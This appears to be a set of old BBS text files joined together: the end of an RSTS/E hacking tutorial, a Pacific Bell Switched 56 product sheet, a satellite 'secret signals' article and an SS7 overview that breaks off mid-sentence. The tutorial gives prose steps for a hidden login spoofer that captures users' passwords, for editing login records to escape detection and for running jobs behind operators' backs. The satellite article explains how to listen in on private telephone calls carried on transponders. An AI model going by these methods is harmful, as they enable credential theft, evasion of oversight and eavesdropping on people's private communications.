open a very large file (all free disk space in fact) and
proceeded to zero this. This was sucessful, except when the
system was supposed to kill the file something went wrong and
the file was not deleted. The next morning, before the sysops
arrived, the users tried to login. Because there was no free
space to write login records or do anything! No-one could
login! Apparently this had the operators mystified why they
couldn't get into their system. They had to reboot, or so I
heard, they later worked out what had happended. They then
asked why!
THE PSEUDO KEYBOARD.
The pseudo keyboard (device PKnn:) must be about the most
useful and versatile device. This is the device to be used
for the perfect hack! Originally, like many people, I saw it
in a manual and really didn't read about it but as usual when
I was going over the manuals with a fine tooth comb I read
into it. Although most of the weak-points discussed in this
tutorial can be removed by patching implemented by the system
operator, they are likely to ignore them. The pseudo keyboard
is a keyboard which doesn't physically exist! When you open
the channel and do I/O's with it it appears like another
keyboard. It even has a keyboard number. This is useful for
extracting inormation for your programs that can only be
accessed in command mode. An example of this is SYSTAT. I
recommend that you get hold of a PROGRAMMING MANUAL and read
it thoroughly, including the section on pseudo keyboards.
PASSWORD CATCHING.
Password catching is always desirable if you want access
to a privilaged account! When I first started out we ran a
crude program which did I/O's to the desired terminal and
gave the responses that the system would give. A number of
problems that we ran into was that you cannot fake the whole
system, that is impossible using those methods, and also this
did not allow for timing delays which most users were used to
and expected.
-3-
With these old programs, the passwords obtained never
lasted long because the user almost always knew they had been
caught because users get suspicious when they get an INVALD
ENTRY - TRY AGAIN message when they put in their correct
password. This problem left me pondering how could you write
the "perfect" password catcher. When I discovered pseudo
keyboards I was thinking of applications, then it hit me. Why
not simulate the whole job of another user? It was possible
too!
To do this you write a program to open a channel to the
keyboard where the person will enter the desired account
number and password. You also open a pseudo keyboard.
Basically from then on you pass the data from one to the
other, and you keep checking what is being typed and when the
account number and password are detected save them to a disk
file encoded or what ever. You should continue to simulate
the job until the person logs off. There are a few things to
be careful about. When the person runs SYSTAT make sure the
output is sent to the terminal replaces the pseudo keyboard
number with his keyboard number. Make sure he doesn't see a
channel is open to his terminal and other things like that.
Another things to be careful of is that he doesn't run
programs to tell him his keyboard number or a few other
things like that or a program where the terminal where it is
run from affects its operation, if he does it could be quite
hard to deal with. All of the techniques I describe will need
practice and perfection. Perfect things before using them and
don't tell people what you are doing. Another thing to be
careful of are operators who look at the files in your
account. A simple way to deal with those people is to
encrypt/code those files and keep decoded copies online for
as little time as possible. If you can't stay at a terminal
to have the password catcher program running don't despair
because I will show you how to detach jobs later. My biggest
piece of advice is always stalk and watch the target system
first for a while. Get to know what most or all of the
programs in the project 1 accounts do, and only after you are
sure should you try and pull a stunt like I decribe. Once you
have a privilaged password you must use your own imagination
to how you use it. Remember always be security conscious.
Don't take unneccessary risks and by the time you get to a
privilaged account you should know all the SYS functions
possible and how to use them to your advantage. If you system
keeps login and logout records remember to edit them, because
depending on what you do, your activities should be able to
go on undetected!
DETACHING JOBS.
There is one way a non-privilaged user can detach a job.
This is done using pseudo keyboards. You will need to read
the PROGRAMMING MANUAL (the RSTS/E bible for hackers!) and
write yourself a program to almost simulate a job except you
do it to your terminal and you don't log the passwords etc..
-4-
When you are logged into your account and you run this
program it will look on your terminal like you are logged out
again and you will have to log into the system again. Log
into the account which you want to detach the job from and
you must have access to the program from this account. You
should execute the program you want detached then have a
special key sequence that will close the channel to the
pseudo keyboard. You detacher program will finish and that is
how you do it. ut you say that doesn't work, it just kills
the job you started when you closed the channel to the pseudo
keyboard, but you didn't wait for the most important piece!
When opening the pseudo keyboard you must have included MODE
1 in the OPEN statement which tells the system to detach the
job when you close the channel instead of killing the job.
When you do a SYSTAT you will see your job running detached.
Don't forget opertors mightn't like you detaching too many
jobs so do it when they aren't around. For a job to terminate
itself you may try getting it to run LOGOUT, but when it
tries to output something like a message saying your disk
space or have a nice afternoon it will sit there helpless in
a HB wait state until someone attaches to it (like you or an
operator) or an operator kills it. To get around this take
notice of the message you get when you log in and you have a
job detached. The system tells you that and asks if you want
to attach. So you what you do is make you detached program
open a pseudo keyboard in a mode that won't detach it and get
that job to log into your account. Don't worry about
entrusting your password to the program as others can't
obtain it. Anyway when you get the new job to log in make it
attach to the job you wanted killed, then when your original
program closes the channel to the pseudo keyboard the job
running on the pseudo keyoard is killed and it effectively
kills itself as it attached to itself in a manner of
speaking, and thus the job disappears! (Well it worked on the
system I tried it on)
RECOMMENDATIONS.
When you attempt to do all of this I advise you to get
hold of (buy ($20) or borrow) the RSTS/E PROGRAMMING MANUAL.
There would be at least one with the system and are also
available from DEC (Digital Equipment Corporation).
Finally, non of the above methods and techniques are
guaranteed as they can be removed or altered by the system
operators. All of the techniques are valid and are not bugs
in the operating system. Whether your operator knows about
them or what they can do is a different matter! Anyhow have
fun, RSTS/E is a good operating system, and don't do anything
that I wouldn't do!
:--------------------------THE-END--------------------------:
+157
View File
@@ -0,0 +1,157 @@
SWITCHED DIGITAL SERVICE 56 (SDS 56)
DESCRIPTION
-------------
SDS 56 is a digital telecommunications service available from
Pacific Bell.
It is a low-cost digital, dial-up alternative to leased lines or
analog services.
CAPABILITIES
------------
Switched 56 is easy to use -- you simply dial another user's
Switched 56 number to transmit data at 56 Kilobits per second
(Kbps). And it's affordable -- your data call won't cost any more
than a regular voice call. For all of these reasons, Switched 56 is
especially suited to intermittent, high-speed data transmission
applications.
EASE OF USE: A standard telephone number is provided for placing
and receiving Switched 56 calls, including 1+, 7 and 10 digit
intraLATA , interLATA and international dialing.
PRICING: Pricing is similar to regular telephone service -- You pay
only for what you use: a low, flat monthly charge plus intraLATA
transport at existing voice usage rates, with time-of-day discounts.
RELIABILITY: Pacific Bell Switched 56 services are designed to
exceed the minimum performance thresholds; they have a Bit Error
Rate of 8.9 x 10(-8) and 95 percent Error Free Seconds (EFS) on 99
percent of end-to-end intraLATA calls.
SUPPORT: All of our data transport products and services are backed
by extensive network services experience and highly trained
professionals. If your require assistance, call us 24 hours a day,
and day of the year.
COMPATIBILITY
-----------------
To ensure the quality and reliability of Pacific Bell Switched 56,
we've designed and engineered the Pacific Bell Circuit Switched Data
56 (CSD 56) network exclusively for switched digital data services.
Pacific Bell offers three products which provide Switched 56
capability using the CSD 56 network: Centrex IS, CenPath, SDS IS
and SDS 56. These products connect to the CSD 56 network and are
fully interoperable with all other connected services, including
Switched 56 services from other local exchange carriers (LECs) and
inter-exchange carriers (IECs). As a result, Pacific Bell Switched
56 users can complete local, long distance, interstate and even
international calls.
You have a choice of IECs on demand.
WHAT YOU NEED
-----------------
You need special equipment to use Switched 56 services, which varies
depending on the application. In all cases you need a DSU (either a
Datapath compatible two-wire DSU or a four-wire Switched 56 DSU with
dialing capability.
Pacific Bell has arrangements with equipment manufacturers to help
you select and install the correct equipment.
BUSINESS USES FOR SDS 56 and SWITCHED 56
-----------------------------------------------
VIDEO CONFERENCING: This exciting application allows businesses to
hold face-to-face, interactive meetings between people in two or
more locations. While the cost of data transport previously put
video conferencing out of the reach of many companies, Switched 56
services make it affordable. Most video codecs (used for video
conferencing) are designed to take two Switched 56 inputs and
automatically combine them for 112 Kbps.
HIGH SPEED BULK DATA TRANSPORT: Switched 56 offers the speed of
dedicated services and the economy of dial-up for transferring data
files. Applications include uploading/downloading, terminal to host
access, database access and shared library resources.
IMAGING: With Switched 56, users can quickly exchange high quality
images, replacing overnight courier services. Imaging applications
include advertising layouts, radiology images, real estate listings,
digitized microfiche, electronic publishing and digitized
fingerprints.
DISASTER RECOVERY/BACKUP: If your are using a 56 Kbps Digital Data
Service (DDS) or Advanced Digital Network (ADN) circuit, it makes
sense to back it up with digital Switched 56 rather than a slower
speed analog dial-up service. That way, you can enjoy digital
service and maintain productivity even during a disaster situation.
GROUP IV FAX: Group IV fax offers superior resolution and is, at a
minimum, five times faster than Group III fax (the current
standard). Switched 56 offers a flexible and low-cost method for
connecting your Group IV machines together. Group IV fax is great
for blueprints, library documents, legal documents and detailed
graphics.
HIGH SPEED TELECOMMUTING: For telecommuters using high speed
workstations, Switched 56 alleviates the communications bottleneck
caused by modems and analog lines.
HIGH QUALITY DIGITIZED AUDIO (7.5 Khz): Many radio stations are
installing Switched 56 service to broadcast from remote locations
instead of using satellite transmission or leased lines.
CONNECTING LANS: SDS 56 can be a cost-effective way to link distant
LANs. With the right equipment, data destined for a remote LAN can
be recognized and the line automatically dialed for a connection
through SDS 56.
CONNECTING REMOTE USERS TO LANS: SDS 56 can be a cost-effective way
to connect remote users (PCs, Macintoshes and workstations) to their
company LAN or host computer.
AVAILABILITY
----------------
Like our other Switched 56 products, SDS 56 transmits data at a
full-duplex, digital synchronous 56 Kbps rate for the price of a
voice phone call. SDS 56 significantly increases Pacific Bell's
Switched 56 availability to more than 80% of our business
customers. With SDS 56 technology, Pacific Bell can now offer
Switched 56 service to customers who previously could not be served
because of technical limitations. In addition, SDS 56 provides a
Switched 56 option for our not-Centrex customers.
To increase the availability of Switched 56 service, SDS 56 will be
provided using either two- or four-wire technology. The distance
from your central office (where the telephone switch is) will
determine which of these technologies will be used -- the four-wire
option extends the service farther.
You can call the Switched Data hotline at 800-995-0346 to find out
about availability for your telephone prefix.
Pacific Bell will work with the inter-exchange carrier (IEC) of your
choice, who provides the long distance portion of your transport.
TO GET MORE INFORMATION
-----------------------------
Contact your Pacific Bell account team for more information.
For fax-back information on any of Pacific Bell's switched digital
products, call 800-995-0346. The fax-back system has diagrams and
other information not on this BBS.
Application example diagrams are available on this BBS for
download. Go to the main menu and visit the FILES FOR DOWNLOAD area.
** Product names mentioned herein may be trademarks and/or
registered trademarks of their respective companies.**
+53
View File
@@ -0,0 +1,53 @@
<< Secret Signals >>
These were articles written by Texas Star. They involve capturing microwave frequencies via a home parabolic dish, a satellite tv antenna.
Our understanding of satellite transponders are usually in terms of video (and audio), but satellite transponders (channels) are also capable of carrying wide range, high fidelity radio channels, audio newswire feeds, special news teletypewriter channels, high speed stock market and commodity exchange data feeds, private telephone and oth
er audio channels, and new teletext data services that bring "electronics newspapers of the air" to ordinary tv sets nationwide.
The basic NTSC (National Television Standards Committee) color tv system requires a communications channel with a bandwidth of 6 MHz. Considering that an ordinary telephone conversation takes up a communications channel whose bandwidth is only 3000 Hz (or 3 KHz), it would be possible to squeeze 2000 such voice conversations onto a single video circuit! This in fact is done re
gularly through a technique known as multiplexing. Because the communications satellites share the same sets of microwave frequencies as to terrestrial telephone company microwave communications relay circuits, an unacceptable amount of interference would occur if some additional technique were not used effectively to seperate the two conflicting microwave signals. Although the communication satellite's transmitter is 22,300 miles away, the telephone company's nearest microwave system may only be three bloc
ks down the street, and an antenna pointed out to space would still pick up the undesired telephone signal coming from a half-mile away. The satellite carriers solve this problem by dispersing the 6 MHz video signal over a 36 MHz bandwidth, spreading out the 6 MHz tv signal so that it takes up a much greater bandwidth than ordinarily required. By using this technique, any terrestrial microwave interference present in a 6 Hz piece of the total 36 MHz spectrum will be effectively ignored in the signal detecti
on process. So, although satellite transponder channels appear to be 36 MHz wide and are spaced at 40 MHz intervals (including a 4 MHz guard-band of unused space seperating each transponder (channel) from its upper and lower neighbors), the effective width of the satellite transponder is limited to far less than that. Typically no more than 8-10 MHz of bandwidth is ever used, and an ordinary U.S. color tv signal takes up no more than 6 MHz of space. Since satellite transponders are not limited to carrying j
ust a 6 MHz tv channel, additional 'secret' signals are often inserted between 6 MHz and 10 MHz.
Audio and data signals that take up less than a full video channel's spectrum are typically known as subcarriers; these are simply frequency-modulated carriers of narrow bandwidth that either take the place of the video signal (when the transponder is not used for carrying tv pictures) or are combined with a video carrier to provide for simultaneous video and audio data feeds. The normal audio portion of a
tv program is placed onto a subcarrier ranging from 5.41 MHz to 7.5 MHz, depending on the satellite. In the North American NTSC color format, a special 3.5 MHz color burst subcarrier containing the color video information is also present in the overall tv signal's spectrum, and in the European PAL and Secam color tv systems, this color information is found instead on a 4.33 MHz subcarrier.
Ordinary tv sets have special color decoder circuits that look for their respective color burst signals to recons
truct the necessary coloring information of the transmitted picture. Since the tv signal itself only requires a portion of the full baseband frequency spectrum to transmit and receive a color video picture, any frequency above approximately 4.2 MHz may be used to carry further unrelated audio or data channels. In the RCA Satcom satellite systems, 4 subcarriers at 5.8, 6.2, 6.8, and 7.4 MHz are available for use, one of which transmits the program audio channel. Thus, on Satcom F-3R, transponder 3 carries no
t only the video and audio portions of the WGN-TV signal from Chicago, but also the Fine Arts WFMT stereo-FM radio station from Chicago on a 5.8 MHz subcarrier, and a Seaburg music channel on a 7.6 MHz subcarrier.
Most of the home satellite video receivers allow for a front panel switch selection of the program audio, which is placed on a subcarrier at either 6.2 or 6.8 MHz, depending on the satellite used (RCA Satcom satellites use 6.8 MHz for the program audio subcarrier). A number of receivers provi
de a variable tuning audio knob to allow any subcarrier to be decoded from 5.8 to 7.4 MHz. This type of receiver, such as the KLM Sky-Eye 4, can pick up not only the audio of a tv program, but also the other 'secret' audio signals transmitted over the same transponder.
When a transponder is not used to relay a tv signal, then the portion of the spectrum ordinarily reserved for the tv video can be used to carry other audio and data signals instead. In normal telephone company parlance, this technique of
squeezing multiple signals onto a single transponder, or carrier, is known as multiplexing, and the most common type employs a technique called single-sideband modulation. In this process unrelated audio or data signals are simply stacked up in ascending frequency, one above the other.
Normal telephone channels have a bandwidth of 4000 Hz (4 KHz), the very highest frequency that a human vocal cord can generate. A single telephone circuit (carrier) is combined with 11 others to form a group of 12 voice
conversations. Five groups with a total bandwidth of 240 KHz when combined together form a supergroup. A supergroup of these 60 voice circuits can be delivered directly to the satellite-coupling earth-station transmitter where they can be inserted from 0 MHz up to 10.75 MHz - the maximunm upward usable limit of the satellite transponder's frequency spectrum. A master group consists of 5 supergroups combined together, or 300 seperate audotelephone channels. A group occupies 48 KHz of bandwidth, a supergroup
takes up 240 KHz of spectrum, and a master group requires 1200 KHz of space. Many master groups can be stacked one on top of the other on a typical satellite transponder, with each supergroup in a master group being seperated by an 8 KHz guard band. Using this clever technique of multiplexing many individual carriers together, a satellite common carrier can literally squeeze thousands of audio telephone channels onto a single satellite transponder.
This process of creating carrier systems of groups, s
upergroups, master groups, and jumbo groups gives the telephone company tremendous flexibility in arranging and routing telephone circuits throughout the country. By careful administrative design, specific supewrgroups or master groups can be assigned for the exclusive use of particular geographic regions or cities. Thus, a given supergroup of 60 voice channels might be arranged for exclusive use between New York and San Francisco, while the supergroup next in frequency might be dedicated for use between Wa
shington D.C. and Los Angeles, and the supergroup above it used between Los Angeles and San Francisco. In this way the complexity of arranging thousands of independent satellite-provided telephone circuits between any two points in the U.S. is reduced to routing a series of easily manageable 12-and-60-channel collections of conversations. Significant equipment savings are also possible as the cost to multiplex, modulate, and demodulate 12 or 60 channels simultaneously is only slightly higher than the cost o
f doing the same for a single-voice circuit!!!
Another technique known as single channel per carrier (SCPC) is offered by the satellite common carriers. It enables a single audio-telephone circuit to be uplinked to the satellite. SCPC transponders do not use the frequency spectrum as efficiently when operating in the single-carrier mode, however, and this format is not used often, but SCPC signals do have the ability to be transmitted up to the satellite with more power, and the satellites relay these
signals to earth at greater power levels, allowing smaller receive-only dish antennas to be used. Because of this feature, many of the news services use this service to deliver high-quality audio news feeds to radio stations nationwide, employing small 3-to-5-foot receive-only parabolic antennas mounted on the radio station roofs. In addition, these same SCPC channels can carry high-speed teletypewriter and data signals also used by the news wire agencies and newspaper chains to relay news stories instantly
throughout the u.S. Both the commodity news service and bonneville satellite corporation use this technique to carry commodity data from exchange floors to points in various parts of the country.
Now that we know there are hundreds of thousands of private audio, data, and telephone channels squeezed on the nonvideo satellite transponders, how can the home satellite dish user pick up these interesting signals? The answer is that it can't directly. But, with the addition of one of the popular short-wav
e communication receivers that will tune the 100 KHz to 30 MHz range, the thousands of hidden channels can be picked up as well!! Companies such as Kenwood or Radio Shack (uggh) sell these receivers, and they are popularly used to receive short-wave radio signals. One of the most popular manufacturers is Kenwood who make the R-1000 receiver which provides an outstanding demodulation system to enable the individual audio channels to be demultiplexed from the transponder's multichannel nonvideo signal.
T
o detect these narrow-band voice and data signals, the antenna input of the communications receiver (say, the R-1000) is connected to the video baseband output of the satellite receiver (say the KLM).
In operation, the satellite receiver is first tuned to the desired transponder, such as, say, transponder 15 of Satcom F3R. The communications receiver is then switched into the single-sideband mode and set to either the lower sideband or upper sideband position. Beginning with the lower sideband selectio
n, set the receiver to it's lowest frequency (100-200 KHz) and simply begin tuning upward across the frequency spectrum. Every 4 KHz or so, a carrier will appear. The carriers will either contain telephone conversations, national radio network audio feeds, private voice communications circuits, or teletypewriter data that will be heard as a series of high-speed varying audio tones.
To convert these tones to teletypewriter signals that can be printed out on a small printer or home computer, a special te
letypewriter decoder modem, known as an RTTY demodulator, must be connected to the audio output of the communications receiver. A number of organizations sell these RTTY demodulators, popularly used by ham radio operators, and the ham radio magazines such as 73, QST, or Ham Radio advertise these devices which retail from 100 to 1000 dollars.
If when tuning the short-wave communications receiver upward in frequency past 4.2 MHz, the signals suddenly disappear, this probably means that the manufacturer o
f your satellite tv receiver has installed a special filtering circuit that allows only the typical 4.2 MHz video channel to be passed. Many manufacturers build in these circuits to minimize the possible noise interference to an ordinary tv set created by unwanted signals outside the tv spectrum. These filters, internal to the receiver, are considered a positive feature for what they do, but for capturing these 'secret signals', a by-pass to any such filtering will have to be installed in the receiver. That
way, a nonvideo transponder carrying many channels beyond 10 MHz can be received! and now, many sat receiver manufacturers are installing a filter-bypass to allow such use.
Downloaded From P-80 International Information Systems 304-744-2253
+506
View File
@@ -0,0 +1,506 @@
Signalling System 7 (SS7)
Whether a call is made to the phone in the house next door or on another
continent, it becomes part of traffic on a network called Signalling System 7,
or SS7. Over the past five to ten years, telephone operating companies have
been upgrading their networks to use this standard communications protocol,
providing them with faster call setup times and the ability to expand their
service offerings. There is a proliferation of communications services ranging
from Caller ID to cellular service to ISDN and the forthcoming AIN or Advanced
Intelligent Network. SS7 plays a major part in many of these services
providing the means for transporting information between locations.
In-band vs. out-of-band
When a phone call is made, call-control information is sent to the locaal
telephone office. The digits dialed are the main routing components that
determine a call's destination. If the dialing is for a local call, the call
may be connected from the same office from which the originating line
terminates. The telephone switch at the local office that services a phone
line may have to route a call to another office connected by a trunk. Call-
control signals such as the number dialed and the answer indication from the
other end are information used for managing a call connection.
Using traditional signalling methods, the trunk between the two offices
carries information down the same set of wires that the voice signal travels.
This is called in-band signalling because the call-control signal is sent down
the same path as the voice signal. SS7 handles all these tasks on a separate
facility know as a signalling link. The signalling link can handle the call-
control information for many calls going on simultaneously. The actual voice
path between the two offices is still over the trunks, while the call-control
signalling is traveling on a separate communications channel. This is called
out-of-band signalling.
SS7 is essentially a packet switching network. Signalling information is
carried in data packets between the telephone offices in much the same manner
as X.25 or other packet switching protocols previously installed. This packet-
switching network is overlaid on top of the existing telephone network, adding
an entirely new diminsion. This gives the telephone network a number of
advantages over the traditional signalling system. The primary benefit is
increased bandwidth for call signalling. The voice trunk is limited since its
primary responsibility is to carry voice or data. SS7 provides additional
bandwidth, a standardized protocol for sending information between different
vendor equipment and increased data transmission speed.
Demand for network services
The greatest benefit for both the telephone operating companies and their
subscribers is the increased capability to provide network services. Prior to
using SS7, many telecommunications equipment vendors had proprietary means for
sending feature-related signalling between offices. This prevented true
networking of services. When Integrated Services Digital Network (ISDN) was
introduced into the marketplace a few years ago, one complaint was its limited
service across geographical locations. This created situations which came to
be known as "ISDN islands." SS7 eliminates this problem by encapsulating the
ISDN call information in packets and transporting them across the network,
bridging the islands.
SS7 enables or enhances a number or services including:
o Enhanced 800 service
o Custom Local Area Signalling Services (CLASS)
o Advanced Intelligent Network Services (AIN)
o ISDN Connectivity
o Cellular Service
Until recently, when you purchased 800 service, the number you were given
actually belonged to the local company that was the service provider. FCC
rulings in recent years haved changed this scheme. Now with an enhanced form
of 800 service, the 800 number can be retained by the subscriber even when he
switches service providers. However, this means that the telephone company can
no longer determine which service provider to route the call to just by the
800 number that's dialed. An SSP uses TCAP (Transaction Capabilities Part) to
query a database at an SCP to determine the service provider for routing the
call to as well as other information associated with the call. An SSP running
CLASS uses TCAP to exchage information on the availability of a called number
with another SSP.
Custom Local Area Signalling Services (CLASS) use SS7 capabilities to deliver
services such as caller ID, automatic redial, and call screening. Call
screening allows the consumer to selectively accept or reject calls from
selected numbers. The information for these services is transported between
offices via SS7 packets.
The standards
The ability to provide information between phone offices without regard for
which vendor's equipment is used requires global standards. Standards are
developed at different levels by different organizations. Global SS7 standards
are developed by the International Telecommunications Union Telecommunications
Standardization Sector (ITU-TS), formerly known as CCITT. Different countries
make their own refinements of the ITU standards as necessary. The discussion
here is limited primarily to North American networks. The American National
Standards Institute (ANSI) and Bellcore further refine the ITU standards for
North American and Regional Bell Operating Companies (RBOCS) respectively.
Virtually anyone in the communications field today will recognize the Open
Systems Interconnection (OSI) model. The OSI stack was developed by the
International Standards Organization (ISO) and contains seven layers
identifying communications functions between two nodes such as the physical
medium used for the connection, the error correction method, addressing
scheme and so on. SS7 is also a protocol and is based on the OSI protocol
stack.
The Protocol
The SS7 protocol (refer to Fig.3) is composed of:
o Message-transfer part
o Signalling connection control part
o ISDN user part
o Transaction capability application
The MTP (message-transfer part) provides the basic transport system for all
SS7 messages. It is responsible for getting information from one network node
to another in a reliable fashion. It makes up the first three levels of the
protocol stack: the physical, link and network layers.
Layer 1, the physical level, specifies the actual medium used for
transmission. It uses a four-wire connection and typically a bit-rate transfer
of 64 kilobits per second (kb/s) or 56 kb/s. V.35 connections may also be used
with incremental transmission rates up to 64 kb/s.
Layer 2, the link level, provides a number of functions to ensure that there
is a good connection between nodes for communicating. Error detecting, error
correction, signalling unit alignment and signalling link alignment are all
part of the link layer's responsibility. It is at this layer that the actual
signalling unit is formed. Signalling units are simply SS7's version of
packets. Signalling units are transmitted across the signalling link
continuously whether there is any information to transmit or not. When there
is actually a message to be sent, it is sent an MSU (message signalling unit).
During periods when there is no inoformation to send, FISU (fill-in signalling
units) are sent. This continuous stream of packets ensures that link problems
are detected immediately. There is a third type of signalling unit, an LSSU
(link-status signalling unit) which is used to convey changes in the status of
the link between the two ends.
The SCCP (signalling-connection control part), which is part of Layer 4,
provides additional routing and network management functions to the MTP. It
allows applications to talk to each other at different nodes and it provides
network management capabilities at the application level. For example, an
application may want to re-route a message in the event of an application
failure. You'll note from the SS7 protocol model (Fig.3) that there is a
connection between the ISUP and SCCP layers. SCCP contains connection-oriented
procedures that may be used by ISUP; however, ISUP doesn't use them today. It
can communicate directly with MTP which suffices for current ISUP needs. New
services may however make use of the SCCP connection-oriented capabilities.
The ISUP (ISDN user part) of Layer 4 provides connection-oriented signalling
between nodes. This type of signalling relates to setting up, taking down and
monitoring the connection of the actual voice path between offices. ISUP is
what provides the capability for phone calls to be completed. It also provides
services such as Caller ID. The name ISDN User Part can be a bit misleading,
however, because you don't need to have ISDN to use this capability. It was
however designed with ISDN capability in mind.
TCAP (transaction capabilities part), also part of Layer 4, allows
connectionless communications between two applications using a generic
language. It provides query and response capabilities allowing nodes to
request and respond to network and service information regardless of whether
there is an actual call established between offices. This opens up an entire
world of database interaction allowing centralized network intelligence in
handling calls.
As mentioned earlier, SS7 is essentially overlaid on the existing telephone
network. This introduces some new network elements as well as giving additonal
capabilities to previously exiting ones. The network is made up of a number
nodes called signalling points. Figure 4 shows a network example consisting of
connected nodes.
The SSP (service-switching point) is the telephone office with SS7
capabilities. It can originate and terminate messages but cannot transfer
them. The STP (signalling-transfer point) takes care of the transfer part. It
is the message-switching hub of the network, essentially a big packet switch.
Many of the routing decisions are made at the STP. Without this node, every
SSP would need to have a connection to every other SSP it was required to send
messages to. This would quickly grow into a complicated scene. STP's are
usually deployed in mated pairs to provide redundancy.
The SCP (service-control point) provides database services. Telephone offices
can send queries to the database requesting information regarding 800 numbers,
Private Virtual Network numbers and calling-card numbers, to name a few.
Network routing
We have seen that the physical connection between offices that provides the
signalling communications is called a signalling link. This link is actually a
part of a linkset. A linkset is simply a set of signalling links connecting
two offices. ANSI specifies that a linkset may contain up to 16 links. Many
offices may be able to handle all of their traffic on a single link per
linkset. However, the desire for additonal traffic capacity or just alternate
facilities in the case of a facility failure often merits additional links.
There can only be one linkset defined between two offices. While links define
physical connections between offices, a route describes the path between a
node and a destination.
A route may consist of multiple linksets. There may be several routes from one
node to another. Each route follows one or more linksets to its destination.
Just as there may be several links in a linkset, a routeset is a set of routes
which describes alternate paths from a node to a destination. When a node
needs to send a message to another node, it chooses a routeset which is
associated with a destination, then chooses a route within the routeset
(remember that a route really just describes a linkset), then chooses a link
within the linkset.
That brings us to the next topic of routing: how to determine which node to
send a message to. Every office is assigned a point code. This is the address
of the office, simply a number to uniquely identify it. Point codes vary in
format depending on the country and the standards they use. The ANSI standards
used by North America designate a 9-digit point code to identify each node in
the network. Each message contains both a destination and point code to
identify the office to send the message to and an origination point code to
identify the office sending the message. Within each office, translations are
done to map this address to a routeset for which outgoing messages are to be
sent. This means that each node must designate routesets for each pointcode it
wishes to directly send messages to.
The decisions about how routing will be done can vary from company to company
and are made by administrators of the network. This type of routing based on
the point codes is done at the network level of the MTP and its primary
responsibility is getting messages from one node to another.
The next level of routing to consider is routing to an application, or in SS7
terms, a subsystem. Subsystem routing is also based on a number designated for
a specific application. This number must be agreed on by different companies
so that a subsystem number identifying a particular subsystem can be
interpreted correctly. These are usually not defined in the more general
standards, but are usually defined by those involved in network
administration. For instance, Bellcore, the research and developement
organization for the regional Bell operating companies has defined a number of
subsystems for their clients in the US. One example is Custom Local Area
Signalling Service (CLASS), which has been defined as subsystem 251.
Therefore, two offices sending CLASS related messages would designate a
subsystem of 251 in the message. Subsystem routing is the responsibility of
the SCCP level of the protocol. At the beginning, we determined that the
digits of the telephone number played a major part in determining how your
call is routed through the network.
One of the popular buzzwords in SS7 terminology is something called global
title translations. A global title is simply a set of digits. These may be
digits dialed by a subscriber or provided by an application by some means.
Global title translations is the process of mapping those digits to an SS7
address, namely a point code and a subsystem. We've determined that a point
code can route a message to an office and a subsystem number can route to an
application. Once these two pieces of information are determined, we have the
means to get a message from our application to an application somewhere else
in the network. Traditional routing in the telephone network is based on
digits. You realize that fact every time you pick up the phone. However, the
SS7 network routes its messages based on the point code and subsystem.
Therefore global title translations are needed, which is also a function of
the SCCP layer of the protocol.
Let's summarize how messages are routed across the SS7 network. When a call
begins its routing process, the dialed digits are examined. For connection-
oriented calls using the ISUP layer of the protocol, the digits are mapped
internally to the appropriate point code by the sending the message to the
next node. The ISUP message also contains a circuit-identification code to
identify which trunk the message relates to. This is necessary because it will
be traveling on a different facility from the actual voice or data call. If
level 2 has determined that both ends of the signalling link are at a suitable
level of service, level 3, the network level, routes the message to the next
office based on the point code.
Now, assume that you're sending a TCAP message to a database to determine
information related to an 800 number. (Refer to Fig.5) The point code to send
the message to would still have to be determined, but a subsystem number would
be needed also. The protocol model shows that a TCAP message must ride on top
of the services of SCCP. Since TCAP is a connectionless message that's
normally related to an application, the subsystem routing service of SCCP are
needed. This is where global title translations comes into play. From the SSP,
the message might be sent to the STP to let it perform translation on the 800
number and determine how to route it to the database. In fact, this is what's
normally done.
It is not necessary for all of the offices to have knowledge of the database
locations. This can be taken care of at a centralized point, the STP. Routing
might occur through multiple STPs before reaching the SCP, but by the time it
arrives, the final point code and subsystem have been determined so that the
800 application software at the appropriate database can handle the message.
The self-healing network
The headlines citing major SS7 outages give insight into the importance of the
signalling network. If an office uses SS7 signalling, its loss means that the
office can't communicate with the rest of the world. It becomes isolated. The
network and protocol design take this into account, providing alternate
routing, compulsive restoration where possible, and internodal communications
to coordinate activities concerning degradation or loss of service. The
network management implemented by the MTP can be divided into three
categories: signalling-link management, signalling-route, and signalling-
traffic management.
Together, these management procedures attempt to maintain service by re-
routing or controlling traffic when there is congestion or a failure in the
network. Built-in recovery procedures attempt to restore network components to
service if possible.
Signalling-link management is responsible for maintaining the path between
nodes. If excessive errors are detected by the link layer, the link may be
deactivated. Siganlling link management will attempt to restore the link
through a process known as signalling link alignment. This involves an
exchange of signalling units (LSSUs) to bring the link back to the proper
state. Each end of the link uses a signalling-unit error-rate monitor to
monitor the number of errors at the link level and determine the stability of
the link. When signalling-link management has determined that the link is
suitable for use, it will report it to level 3 as being available.
Signalling-route management maintains and distributes information and
distributes information between nodes on the availability of signalling
routes. Much like a traffic reporter, it sends out messages about the loss or
degradation of routes causing other nodes to choose alternate routing or take
appropriate actions.
In Fig.6, for example, assume that the link between SSP A and STP 1 failed.
The STP would send a transfer-restricted (TFR) message to the other SSPs
informing them that it has limited routing capabilities to access node A. The
TFR message would contain the point code identifying node A as the subject of
the message. As long as the other nodes are able to route messages by another
route, they will not try to access node A through this STP. This helps to
minimize the traffic between the two STP unless it is absolutely necessary,
since STP 1 would have to route any messages it received destined for A
through STP 2. The other network nodes can still route through STP 2 with no
problem.
Since STP 2 will not be able to send messages to SSP A via STP 1 at all, STP 1
sends a transfer-prohibited (TFP) message to STP 2. This message contains the
point code for SSP A marking its route as unavailable for messages coming from
STP 2 in this direction. As you can see the only way STP 1 can get a message
to SSP A would be to route it through STP 2. It would have to send the message
right back, causing double traffic over the link joining the two STPs. The TFP
will prevent that situation.
When the route between STP 1 and SSP A is restored, STP 1 will send out
transfer-allowed (TFA) messages to its adjacent nodes, informing them that
routing is again available to SSP A. There are additional messages that are
used to accomplish all the tasks that need to be handled by routeset
management but this scenario gives you an idea of how nodes communicate the
availability of routes between each other.
The third area of network management is sigalling-traffic management, which is
responsible for routing the traffic in the network as the availability of
routes change. Let's take our previous example and look at how traffic
management handles this situation. At SSP A, all traffic destined for STP 1
must be stopped and re-routed to STP 2. Link-layer procedures exist to attempt
to account for all messages which might have been in transit between the nodes
when the failure occured to ensure that messages are not lost. This
communication is done using the route through STP 2. This coordination between
the two nodes terminating the faulty route is called a changeover and is one
example of how traffic management works in the SS7 network. Traffic which was
destined for the linkset to STP 1 will now be changed over to the linkset for
STP 2.
Again, there are a number of such procedures that make up signalling-traffic
management. Congestion procedures were not even mentioned. But network
